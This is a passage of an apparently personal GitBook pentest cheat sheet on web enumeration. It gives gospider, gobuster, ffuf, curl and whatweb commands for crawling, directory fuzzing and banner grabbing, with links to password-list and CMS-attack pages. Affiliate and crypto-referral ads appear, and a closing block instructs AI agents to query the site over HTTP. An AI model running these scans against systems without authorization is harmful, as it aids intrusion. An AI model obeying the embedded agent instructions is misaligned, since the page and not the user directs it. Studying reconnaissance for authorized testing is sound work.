https://vulners.com/cve/CVE-2018-1312 | CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715 ``` {% embed url="" %} {% embed url="" %} ### Lostfuzzer {% embed url="" %} ## Admin interface {% content-ref url="/pages/lPfVbJctPeqTcOjUhbgQ" %} [Password lists](/0xss0rz/pentest/brute-force/password-lists.md) {% endcontent-ref %} ## CMS {% embed url="" %} {% content-ref url="/pages/BNYnMWR6ycmbnuzzgqLK" %} [CMS](/0xss0rz/pentest/web-attacks/cms.md) {% endcontent-ref %} ## Crawling ### Crawl with 2 separate user-agent Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes! ``` gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt ```
### Gospider {% embed url="" %} {% embed url="" %} ### Hakrawler {% embed url="" %} ### With Burp {% embed url="" %} ### With Zap {% embed url="" %} ``` sudo snap install zaproxy --classic ``` * Spidering
* Fuzzing
## Fuzz [Wordlists](#wordlists) {% content-ref url="/pages/uDePbcQDhOjtjRKV8h1f" %} [Fuzzing](/0xss0rz/pentest/web-attacks/fuzzing.md) {% endcontent-ref %} ``` gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt ``` ```shell-session ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt ``` ```shell-session ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS ``` #### Admin interface=> [Password guessing](/0xss0rz/pentest/brute-force/password-lists.md) #### [CMS](/0xss0rz/pentest/web-attacks/cms.md) ## Banner grabbing ``` curl -IL https://www.inlanefreight.com ``` Tool: ; or Aquatone {% content-ref url="/pages/ziUET1mKbgC3HbH4BP0f" %} [Information Gathering](/0xss0rz/pentest/recon/information-gathering.md) {% endcontent-ref %} ``` whatweb 10.10.10.121 whatweb --no-errors 10.10.10.0/24 ``` ## DNS Subdomain Enumeration {% content-ref url="/pages/SCrO3Y5edNNTmZbcS19w" %} [DNS Subdomain Enumeration](/0xss0rz/pentest/recon/dns-subdomain-enumeration.md) {% endcontent-ref %} ## Cloudflare Bypass for Web Scraping {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/web-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.